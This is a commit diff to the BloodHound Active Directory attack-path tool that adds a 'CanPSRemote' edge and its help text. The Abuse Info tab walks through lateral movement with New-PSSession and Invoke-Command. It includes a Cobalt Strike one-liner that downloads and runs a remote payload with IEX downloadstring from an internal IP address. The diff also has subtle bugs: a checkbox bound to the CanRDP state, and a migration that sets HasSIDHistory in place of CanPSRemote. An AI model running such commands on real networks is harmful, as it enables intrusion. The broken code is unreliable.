Add CanPSRemote help text

BloodHoundAD · Feb 11, 2020 · 89fa966 · 89fa966
1 parent 8ea7201
commit 89fa966
Show file tree

Hide file tree

Showing 9 changed files with 140 additions and 1 deletion.
diff --git a/src/components/Modals/AddEdgeModal.jsx b/src/components/Modals/AddEdgeModal.jsx
@@ -255,6 +255,7 @@ const AddEdgeModal = () => {
                             <option value='Contains'>Contains</option>
                             <option value='GpLink'>GpLink</option>
                             <option value='CanRDP'>CanRDP</option>
+                            <option value='CanPSRemote'>CanPSRemote</option>
                             <option value='ExecuteDCOM'>ExecuteDCOM</option>
                             <option value='AllowedToDelegate'>
                                 AllowedToDelegate

diff --git a/src/components/Modals/HelpModal.jsx b/src/components/Modals/HelpModal.jsx
@@ -28,6 +28,7 @@ import SQLAdmin from './HelpTexts/SQLAdmin/SQLAdmin';
 import ReadGMSAPassword from './HelpTexts/ReadGMSAPassword/ReadGMSAPassword';
 import HasSIDHistory from './HelpTexts/HasSIDHistory/HasSIDHistory';
 import TrustedBy from './HelpTexts/TrustedBy/TrustedBy';
+import CanPSRemote from './HelpTexts/CanPSRemote/CanPSRemote';
 
 const HelpModal = () => {
     const [sourceName, setSourceName] = useState('');
@@ -85,6 +86,7 @@ const HelpModal = () => {
         ReadGMSAPassword: ReadGMSAPassword,
         HasSIDHistory: HasSIDHistory,
         TrustedBy: TrustedBy,
+        CanPSRemote: CanPSRemote,
     };
 
     const Component = components[edge];
@@ -119,4 +121,3 @@ const HelpModal = () => {
 
 HelpModal.propTypes = {};
 export default HelpModal;
-
diff --git a/src/components/Modals/HelpTexts/CanPSRemote/Abuse.jsx b/src/components/Modals/HelpTexts/CanPSRemote/Abuse.jsx
@@ -0,0 +1,38 @@
+import { typeFormat } from '../Formatter';
+const Abuse = (sourceName, sourceType, targetName, targetType) => {
+    let text = `Abuse of this privilege will require you to have interactive access with a system on the network.
+    
+    A remote session can be opened using the New-PSSession powershell command.
+
+    You may need to authenticate to the Domain Controller as ${
+        sourceType === 'User'
+            ? `${sourceName} if you are not running a process as that user`
+            : `a member of ${sourceName} if you are not running a process as a member`
+    }. To do this in conjunction with New-PSSession, first create a PSCredential object (these examples comes from the PowerView help documentation):
+    
+    <code>$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+    $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)</code>
+
+    Then use the New-PSSession command with the credential we just created:
+
+    <code>$session = New-PSSession -ComputerName ${targetName} -Credential $Cred</code>
+    
+    This will open a powershell session on ${targetName}.
+    
+    You can then run a command on the system using the Invoke-Command cmdlet and the session you just created
+    
+    <code>Invoke-Command -Session $session -ScriptBlock {Start-Process cmd}</code>
+
+    Cleanup of the session is done with the Disconnect-PSSession and Remove-PSSession commands.
+    
+    <code>Disconnect-PSSession -Session $session
+    Remove-PSSession -Session $session</code>
+
+    An example of running through this cobalt strike for lateral movement is as follows:
+
+    <code>powershell $session =  New-PSSession -ComputerName win-2016-001; Invoke-Command -Session $session -ScriptBlock {IEX ((new-object net.webclient).downloadstring('http://192.168.231.99:80/a'))}; Disconnect-PSSession -Session $session; Remove-PSSession -Session $session</code>
+    `;
+    return { __html: text };
+};
+
+export default Abuse;
diff --git a/src/components/Modals/HelpTexts/CanPSRemote/CanPSRemote.jsx b/src/components/Modals/HelpTexts/CanPSRemote/CanPSRemote.jsx
@@ -0,0 +1,47 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+import { Tabs, Tab } from 'react-bootstrap';
+import General from './General';
+import Abuse from './Abuse';
+import Opsec from './Opsec';
+import References from './References';
+
+const CanPSRemote = ({ sourceName, sourceType, targetName, targetType }) => {
+    return (
+        <Tabs defaultActiveKey={1} id='help-tab-container' justified>
+            <Tab
+                eventKey={1}
+                title='Info'
+                dangerouslySetInnerHTML={General(
+                    sourceName,
+                    sourceType,
+                    targetName,
+                    targetType
+                )}
+            />
+            <Tab
+                eventKey={2}
+                title='Abuse Info'
+                dangerouslySetInnerHTML={Abuse(
+                    sourceName,
+                    sourceType,
+                    targetName,
+                    targetType
+                )}
+            />
+            <Tab
+                eventKey={3}
+                title='Opsec Considerations'
+                dangerouslySetInnerHTML={Opsec()}
+            />
+            <Tab
+                eventKey={4}
+                title='References'
+                dangerouslySetInnerHTML={References()}
+            />
+        </Tabs>
+    );
+};
+
+CanPSRemote.propTypes = {};
+export default CanPSRemote;
diff --git a/src/components/Modals/HelpTexts/CanPSRemote/General.jsx b/src/components/Modals/HelpTexts/CanPSRemote/General.jsx
@@ -0,0 +1,15 @@
+import { groupSpecialFormat, typeFormat } from '../Formatter';
+
+const General = (sourceName, sourceType, targetName, targetType) => {
+    let text = `${groupSpecialFormat(
+        sourceType,
+        sourceName
+    )} the capability to create a PSRemote Connection with the computer ${targetName}.
+    
+    PS Session access allows you to enter an interactive session with the target computer. If authenticating as a low privilege user, a privilege escalation may allow you to gain high privileges on the system.
+    
+    Note: This edge does not guarantee privileged execution.`;
+    return { __html: text };
+};
+
+export default General;
diff --git a/src/components/Modals/HelpTexts/CanPSRemote/Opsec.jsx b/src/components/Modals/HelpTexts/CanPSRemote/Opsec.jsx
@@ -0,0 +1,8 @@
+const Opsec = () => {
+    let text = `When using the PowerShell functions, keep in mind that PowerShell v5 introduced several security mechanisms that make it much easier for defenders to see what's going on with PowerShell in their network, such as script block logging and AMSI.
+
+            Entering a PSSession will generate a logon event on the target computer.`;
+    return { __html: text };
+};
+
+export default Opsec;
diff --git a/src/components/Modals/HelpTexts/CanPSRemote/References.jsx b/src/components/Modals/HelpTexts/CanPSRemote/References.jsx
@@ -0,0 +1,7 @@
+const References = () => {
+    let text = `<a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7">https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7/</a>
+            <a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7">https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7</a>`;
+    return { __html: text };
+};
+
+export default References;
diff --git a/src/components/SearchContainer/EdgeFilter.jsx b/src/components/SearchContainer/EdgeFilter.jsx
@@ -24,6 +24,7 @@ const EdgeFilter = ({ open }) => {
             current.ReadGMSAPassword = false;
         } else if (section === 'special') {
             current.CanRDP = false;
+            current.CanPSRemote = false;
             current.ExecuteDCOM = false;
             current.AllowedToDelegate = false;
             current.AddAllowedToAct = false;
@@ -59,6 +60,7 @@ const EdgeFilter = ({ open }) => {
             current.ReadGMSAPassword = true;
         } else if (section === 'special') {
             current.CanRDP = true;
+            current.CanPSRemote = true;
             current.ExecuteDCOM = true;
             current.AllowedToDelegate = true;
             current.AddAllowedToAct = true;
@@ -403,6 +405,19 @@ const EdgeFilter = ({ open }) => {
                     CanRDP
                 </label>
             </div>
+            <div>
+                <input
+                    className='checkbox-inline'
+                    type='checkbox'
+                    name='CanPSRemote'
+                    checked={edgeIncluded.CanRDP}
+                    onChange={e => handleEdgeChange(e)}
+                />
+                <label onClick={e => handleEdgeChange(e)} name='CanPSRemote'>
+                    {' '}
+                    CanPSRemote
+                </label>
+            </div>
             <div>
                 <input
                     className='checkbox-inline'

diff --git a/src/index.js b/src/index.js
@@ -183,6 +183,7 @@ global.appStore = {
             SQLAdmin: 'tapered',
             ReadGMSAPassword: 'tapered',
             HasSIDHistory: 'tapered',
+            CanPSRemote: 'tapered',
         },
     },
     lowResPalette: {
@@ -222,6 +223,7 @@ global.appStore = {
             SQLAdmin: 'line',
             ReadGMSAPassword: 'line',
             HasSIDHistory: 'line',
+            CanPSRemote: 'line',
         },
     },
     highResStyle: {
@@ -359,6 +361,11 @@ if (!appStore.edgeincluded.hasOwnProperty('HasSIDHistory')) {
     conf.set('edgeincluded', appStore.edgeincluded);
 }
 
+if (!appStore.edgeincluded.hasOwnProperty('CanPSRemote')) {
+    appStore.edgeincluded.HasSIDHistory = true;
+    conf.set('edgeincluded', appStore.edgeincluded);
+}
+
 // if (!appStore.edgeincluded.hasOwnProperty("ReadLAPSPassword")) {
 //     appStore.edgeincluded.ReadLAPSPassword = true;
 //     conf.set("edgeincluded", appStore.edgeincluded)